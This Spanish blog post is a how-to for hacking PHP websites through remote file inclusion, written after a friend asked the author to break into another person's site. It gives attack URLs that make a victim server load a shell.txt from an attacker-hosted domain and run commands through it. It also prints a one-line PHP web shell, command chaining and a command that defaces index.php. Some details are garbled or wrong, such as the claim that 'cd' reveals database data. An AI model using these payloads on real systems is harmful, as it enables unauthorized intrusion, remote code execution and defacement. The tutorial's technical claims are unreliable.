Hoy por la mañana me lebante y un amigo mio sintio la inquietud de pedirme el favor de que yo le hiciera el favor de hackearle un pagina de un amigo por lo que me reservo el nombre de el ya que me a ayudado bastante diciendome algunos links roto que estan en el blog sin mas que decirle a el le escribo esto para que tenga una idea mas o menos de como se hackea una pagina
Esta vulneravilidad solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros servidores o paginas web, esta vulneravilidad es provocada por una mala programacion o un error al programar,En la cual Puedes entrar a muchos lados con los comandos.
La pagina puede ser vulnerable a ataques RFI si la url es masomenos similar a esta que tenemos aqui:
http://[servidor_victima]/index.php?.
Para obtener la shell de la web solo necesitamos este codigo:
http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.
Esa seria una web vulenerable.
Ejemplo:http//ww.rush.com/index.php?
Para poder hacer un ataque RFI tendremos que hacer esto:
http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(comando)
Para saber si es vulnerable en el block de notas pegas esto
system($cmd)
?>
aora lo guardamos con el nombre de shell.txt y lo subomos a un servidore, de preferencia que no sea php para que no se ejecute en tu servidor.
Oora procedemos a usar esto:
http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(aqui va el comando.)
y listo asi explotaran el comando.
Un ejemplo de una shell explotada:
http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=pwd
pwd—> nos muestra en que parte del servidor estamos por ejemplo:
Home/host/www
Una Shell para sobreescribir un archivo es:
/shell.txt?&cmd=Defaced By: rUsH >index.php.
Para ejecutar mas de un comando solo usen esto “;”
/shell.txt?&cmd=[coamando];[Comando];[Comando]
Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar usa este comando
/shell.txt?&cmd=ls -la —> y te mostrara los permisos con sus respectivos archivos
Para saber los datos de la DB usa este comando:
/shell.txt?&cmd=cd
Es todo.
0 comentarios:
Publicar un comentario
¡Hola!
Gracias por visitar mi blog mejoresentodoonline.tk
Espero y no sea tu ultima visita.
Deja un comentario, sugerencia, observacion o lo que quieras.
Nota:NO se responderan a comentarios anonimos, en caso de que necesites alguna respuesta necesitas poner tu nombre y url(si tienes), en caso contrario lo tomaremos como un comentario, y no como ayuda.
thank for you comment!!!!!